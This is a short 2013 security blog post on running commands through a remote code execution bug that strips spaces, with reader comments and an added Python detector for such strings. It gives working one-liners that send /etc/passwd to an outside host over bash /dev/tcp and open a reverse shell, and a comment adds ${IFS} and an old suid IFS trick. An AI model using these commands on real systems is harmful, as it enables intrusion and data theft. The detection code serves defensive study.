Thursday, 10 October 2013

[EN] Unix RCE without spaces

You have a remote code execution bug, but spaces are removed from your input. How do you pass parameters in this case? And what if you can't see the result of the executed command? A small trick helps: redirecting standard input and output.

Here we go:

zoczus@hell:~$ cat</etc/debian_version 
7.1

:) Can't see the output? Send it over the Internet!

[host1]
zoczus@hell:~$ cat</etc/passwd>/dev/tcp/xxxx.pl/5060


[host2]
zoczus@jano:~$ nc -l -p 5060
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
(...)

It looks all right ;) You can also create a reverse shell:

sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222

Now /bin/sh takes its input (commands) from xxxx.pl:5060 and sends the result to xxxx.pl:2222.

I hope this one was useful ;)
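For detection, the following added example (not part of the original post) flags the constructs this page relies on: a redirect glued directly to a command name, the bash /dev/tcp pseudo-path, and the ${IFS} separator mentioned in the comments. The sample lines, the collector.example host and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Heuristics for shell strings that work without literal spaces.
PATTERNS = {
    # bash network pseudo-path, e.g. >/dev/tcp/host/5060 (bash also has /dev/udp)
    "dev_tcp": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    # ${IFS} or $IFS standing in for a space
    "ifs_separator": re.compile(r"\$\{?IFS\b"),
    # redirect glued to the preceding word and followed by an absolute path
    # with at least two components, e.g. cat</etc/passwd (skips HTML like </b>)
    "glued_redirect": re.compile(r"\w[<>]{1,2}/[\w.-]+/"),
}

# Constructed sample input: command strings as a process-audit or web log might record them.
SAMPLE = [
    'sh -c "ping -c 1 192.0.2.10"',
    'sh -c "cat</etc/debian_version"',
    'sh -c "cat</etc/passwd>/dev/tcp/collector.example/5060"',
    'sh -c "cat${IFS}/etc/passwd"',
    'sh -c "sort < /tmp/in > /tmp/out"',
    "cmd=cat%3C/etc/passwd%3E/dev/tcp/collector.example/5060",
]


def normalise(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so encoded payloads still match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(value):
    """Return the sorted names of all heuristics that match one logged string."""
    text = normalise(value)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))


def scan_lines(lines):
    """Return (line_number, hits) for every line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := scan(line))]


if __name__ == "__main__":
    for number, hits in scan_lines(SAMPLE):
        print(number, ",".join(hits), SAMPLE[number - 1])
```

Normally spaced redirects such as `sort < /tmp/in > /tmp/out` are not flagged, so the glued_redirect rule is a triage signal for the space-free form rather than a general redirect detector.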

10 comments:

  1. Cool note - I've just learned about /dev/tcp recently and I was really surprised to see such a thing since I've looked at /dev quite often and had never seen it - that of course might be related to the fact that it's not a device, it's a bash feature huh ;)

    As for spaces, ${IFS} can be used instead (field separator). I guess there was that old bug with IFS not being cleared in suid binaries calling system("/bin/something"); later on, and you would switch IFS to / and make a file called bin in cwd ;) (fixing PATH to point at . as well ofc).

    Cheers

    Replies
    1. Answering after a month - right... ;-) Anyway, thanks for reading. The solution with IFS seems to be simpler and better than "mine" ;)
